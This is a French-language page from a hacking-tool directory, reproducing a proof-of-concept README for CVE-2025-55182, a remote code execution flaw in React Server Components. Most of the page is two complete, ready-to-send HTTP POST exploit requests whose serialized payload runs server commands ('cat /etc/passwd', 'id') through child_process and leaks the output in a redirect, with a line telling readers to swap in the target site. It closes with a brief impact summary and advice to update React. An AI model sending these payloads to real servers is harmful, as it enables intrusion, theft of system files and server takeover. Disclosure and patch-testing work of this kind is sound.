Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
React2Shell_cve-2025-55182 — Preuve de concept pour CVE-2025-55182, démontrant l'exécution de code à distance dans les composants serveur React via une désérialisation de requête non sécurisée. Inclut des requêtes HTTP malveillantes pour les tests d'intrusion. | Kitploit
Outils/GitHubGitHub/ethicalrohitt/react2shell_cve-2025-55182
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubethicalrohitt/react2shell_cve-2025-55182

React2Shell_cve-2025-55182

Preuve de concept pour CVE-2025-55182, démontrant l'exécution de code à distance dans les composants serveur React via une désérialisation de requête non sécurisée. Inclut des requêtes HTTP malveillantes pour les tests d'intrusion.

Voir le dépôt
il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

React Server Components RCE - CVE-2025-55182

Bonjour ! J'espère que vous passez une excellente journée ! 😊✨

De quoi s'agit-il ?

Les versions 19.0.0, 19.1.0, 19.1.1 et 19.2.0 de React Server Components présentent un grave problème de sécurité. Les paquets react-server-dom-parcel, react-server-dom-turbopack et react-server-dom-webpack sont concernés.

Le problème survient lorsque le serveur lit les données des requêtes de manière non sécurisée. Les attaquants peuvent envoyer des données spéciales qui amènent le serveur à exécuter leurs commandes.


Preuve de concept - Exemple d'attaque complet

Voici la requête d'attaque complète qui illustre le problème. J'ai remplacé les commandes par des exemples sûrs.

Remplacez target-website.com par le site web que vous testez.

Requête d'attaque n° 1 - Lire un fichier système

root@kitploit:~
POST / HTTP/1.1
Host: target-website.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 721

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat /etc/passwd|tr \"\\n\" \"@\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Requête d'attaque n° 2 - Vérifier les informations utilisateur

root@kitploit:~
POST / HTTP/1.1
Host: target-website.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 691

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Explication simple

  1. Le serveur lit les données de la requête
  2. Des données malveillantes peuvent piéger le serveur pour qu'il exécute des commandes
  3. Les attaquants peuvent exécuter n'importe quelle commande de leur choix
  4. Les commandes sont cachées dans les données que nous envoyons

Que peut-il se passer ?

Les attaquants peuvent :

  • Exécuter n'importe quelle commande sur le serveur
  • Lire des fichiers secrets
  • Prendre le contrôle du serveur
  • Voler toutes les données

Comment corriger le problème

Mettez React à jour immédiatement ! Obtenez la dernière version dans laquelle ce problème est corrigé.


Liens utiles

  • Outil de scan officiel
  • Détails techniques
  • Avis de sécurité de Facebook
  • Liste de sécurité OpenWall
  • Blog officiel de React
  • Avis de sécurité de Next.js
  • Avis de mise à jour de Vercel

Prenez soin de vous et restez en sécurité ! ✨❤️

Télécharger l’outil